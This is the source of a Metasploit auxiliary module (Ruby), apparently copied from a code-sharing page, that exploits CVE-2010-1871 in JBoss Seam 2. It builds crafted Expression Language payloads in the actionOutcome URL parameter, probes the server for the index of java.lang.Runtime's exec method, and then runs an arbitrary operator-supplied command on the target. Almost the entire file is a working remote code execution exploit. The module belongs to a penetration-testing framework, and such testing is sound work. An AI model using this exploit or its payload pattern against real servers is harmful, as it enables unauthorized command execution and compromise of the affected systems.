Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/http/jboss_seam_exec.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HttpClient
8
9
def initialize(info = {})
10
super(
11
update_info(
12
info,
13
'Name' => 'JBoss Seam 2 Remote Command Execution',
14
'Description' => %q{
15
JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform
16
4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression
17
Language (EL) expressions, which allows remote attackers to execute arbitrary code
18
via a crafted URL. This modules also has been tested successfully against IBM
19
WebSphere 6.1 running on iSeries.
20
21
NOTE: this is only a vulnerability when the Java Security Manager is not properly
22
configured.
23
},
24
'Author' => [
25
'guerrino di massa', # Metasploit module
26
'Cristiano Maruti <cmaruti[at]gmail.com>' # Support for IBM Websphere 6.1
27
],
28
'License' => MSF_LICENSE,
29
'References' => [
30
['CVE', '2010-1871'],
31
['OSVDB', '66881']
32
],
33
'DisclosureDate' => '2010-07-19',
34
'Notes' => {
35
'Stability' => [CRASH_SAFE],
36
'SideEffects' => [IOC_IN_LOGS],
37
'Reliability' => []
38
}
39
)
40
)
41
42
register_options(
43
[
44
Opt::RPORT(8080),
45
OptString.new('TARGETURI', [ true, 'Target URI', '/seam-booking/home.seam']),
46
OptString.new('CMD', [ true, 'The command to execute.'])
47
]
48
)
49
end
50
51
def run
52
uri = normalize_uri(target_uri.to_s)
53
cmd_enc = ''
54
cmd_enc << Rex::Text.uri_encode(datastore['CMD'])
55
56
flag_found_one = 255
57
flag_found_two = 255
58
59
uri_part_1 = "?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
60
uri_part_2 = "].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
61
uri_part_3 = "].invoke(null),'"
62
63
25.times do |index|
64
req = uri + uri_part_1 + index.to_s + ']}'
65
66
res = send_request_cgi(
67
{
68
'uri' => req,
69
'method' => 'GET'
70
}, 20
71
)
72
73
if res && res.headers['Location'] =~ /java.lang.Runtime.exec%28java.lang.String%29/
74
flag_found_one = index
75
print_status('Found right index at [' + index.to_s + '] - exec')
76
elsif res && res.headers['Location'] =~ /java.lang.Runtime\+java.lang.Runtime.getRuntime/
77
print_status('Found right index at [' + index.to_s + '] - getRuntime')
78
flag_found_two = index
79
else
80
print_status("Index [#{index}]")
81
end
82
end
83
84
if flag_found_one != 255 && flag_found_two != 255
85
print_status('Target appears VULNERABLE!')
86
print_status('Sending remote command:' + datastore['CMD'])
87
88
req = uri + uri_part_1 + flag_found_one.to_s + uri_part_2 + flag_found_two.to_s + uri_part_3 + cmd_enc + "')}"
89
90
res = send_request_cgi(
91
{
92
'uri' => req,
93
'method' => 'GET'
94
}, 20
95
)
96
97
if res && res.headers['Location'] =~ /pwned=java.lang.UNIXProcess/
98
print_good('Exploited successfully')
99
else
100
print_error('Exploit failed')
101
end
102
else
103
print_error('Target appears not vulnerable!')
104
end
105
end
106
end
107
108